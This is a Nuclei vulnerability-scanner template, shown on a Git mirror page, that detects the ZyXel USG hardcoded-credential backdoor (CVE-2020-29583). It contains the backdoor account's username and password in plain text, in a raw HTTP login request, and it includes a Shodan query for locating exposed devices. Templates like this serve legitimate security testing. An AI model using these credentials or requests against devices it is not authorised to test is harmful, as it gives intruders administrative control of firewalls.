daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2020/CVE-2020-29583.yaml

57 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2020-29583
info:
name: ZyXel USG - Hardcoded Credentials
author: canberbamber
severity: critical
description: |
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
remediation: |
Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
reference:
- https://www.zyxel.com/support/CVE-2020-29583.shtml
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29583
cwe-id: CWE-522
epss-score: 0.96102
epss-percentile: 0.99317
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zyxel
product: usg20-vpn_firmware
shodan-query: title:"USG FLEX 100"
tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev
http:
- raw:
- |
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
Host: {{Hostname}}
- |
GET /ext-js/index.html HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- 'data-qtip="Web Console'
- 'CLI'
- 'Configuration"></a>'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f91e014446c047cdebc7ed9c7f6dfb09a39ae6a5f956c01c5060be0be46557b8022100b654f55dc4bcb1ef67624f99a1081921d6aa7fe348d4b254087a27e37ef0c25b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink